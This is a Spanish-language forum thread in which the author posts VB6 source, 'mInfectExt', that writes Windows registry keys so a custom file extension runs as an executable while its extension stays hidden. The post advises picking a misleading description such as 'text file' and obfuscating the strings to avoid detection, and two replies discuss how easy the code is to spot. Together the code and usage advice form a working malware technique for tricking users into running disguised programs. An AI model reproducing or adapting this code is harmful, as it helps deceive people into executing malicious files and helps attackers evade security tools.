[SRC] mInfectExt.bas [Infeccion de extensiones]

Iniciado por Elemental Code, 24 Julio 2010, 22:41 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Elemental Code

24 Julio 2010, 22:41 PM Ultima modificación: 25 Julio 2010, 18:28 PM por Elemental Code
Que hace?
Modifica el Registro añadiendo una nueva extensión de archivo

Para que sirve?
Posta esto sirve?
Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Sencillamente lo que hacemos es "convencer" al sistema que nuestro archivo "PokebolaVe.jpg" es un ejecutable y que debe ser ejecutado como tal.

Como hace?
Se modifican unos valores en el registro.
Estos son:
(suponiendo que nuestra extensión es .Troj
Código [Seleccionar]

HKEY_CLASSES_ROOT\.troj\"trojfile"
HKEY_CLASSES_ROOT\trojfile\"Documento de texto"
HKEY_CLASSES_ROOT\trojfile\"NeverShowExt"=""
HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command\""%1" %*"


Codigo mInfectExt
Código (vb) [Seleccionar]

Option Explicit
' /-----------------------------------------------------------------------------------\
'|=====================================================================================|
'|=/---------------------------------------------------------------------------------\=|
'|=| Module      : mInfectExt                                                        |=|
'|=| DateTime    : 24/07/2010 05:14 PM                                               |=|
'|=| Author      : Elemental Code                                                    |=|
'|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
'|=| WebPage     : I haven't got one Yet ^.^                                         |=|
'|=| Purpose     : EDUCATIONAL ONLY code that creates a new extensión in Windows Reg |=|
'|=| Requirements: UAC may Stop you, i dont know >.<                                 |=|
'|=| Distribution: You can freely use this code in your own                          |=|
'|=|               applications, but you may not reproduce                           |=|
'|=|               or publish this code on any web site,                             |=|
'|=|               online service, or distribute as source                           |=|
'|=|               on any media without express permission.                          |=|
'|=\---------------------------------------------------------------------------------/=|
'|=====================================================================================|
' \-----------------------------------------------------------------------------------/
Public Function InfectExt(Ext As String, Info As String, Ocult as Boolean)
   Dim WS As Object
   Dim FullExt As String
   Dim UniqVal As String
   UniqVal = Ext & "File"
   FullExt = "." & Ext

   Set WS = CreateObject("WScript.Shell")
   WS.RegWrite "HKCR\" & FullExt & "\", UniqVal
   WS.RegWrite "HKCR\" & UniqVal & "\", Info
    If Ocult = True Then
       WS.RegWrite "HKCR\" & UniqVal & "\NeverShowExt", ""
    EndIf
   WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
End Function


Como Usar
lo llamamos y ponemos la extensión (sin el Punto .) y la Descripcion del archivo (traten de que se confunda con otra cosa >.<)
Código (vb) [Seleccionar]
InfectExt "virus", "Archivo de Texto", True


PD: "Encripten" todas las cosas entre comillas ("")para hacerlo indetectable ^.^



Editado, Ahora permite elegir si la extensión queda siempre oculta o no.

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas

Pure Ice

#1
25 Julio 2010, 00:15 AM
Había un programa viejo que hacía esto, creaba extensiones que hacían esto
exáctamente... ,  y un bat también se creó.. pero bueno, siempre se agradece
el trabajo no?

Saludos :D

Psyke1

#2
27 Julio 2010, 00:05 AM
Citar
Código (vb) [Seleccionar]
WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
No crees que "HKCR\" canta un poco??  :rolleyes:
Aun asi bueno ;)

DoEvents¡! :P
Imprimir
Ir Arriba Páginas1
Acciones del Usuario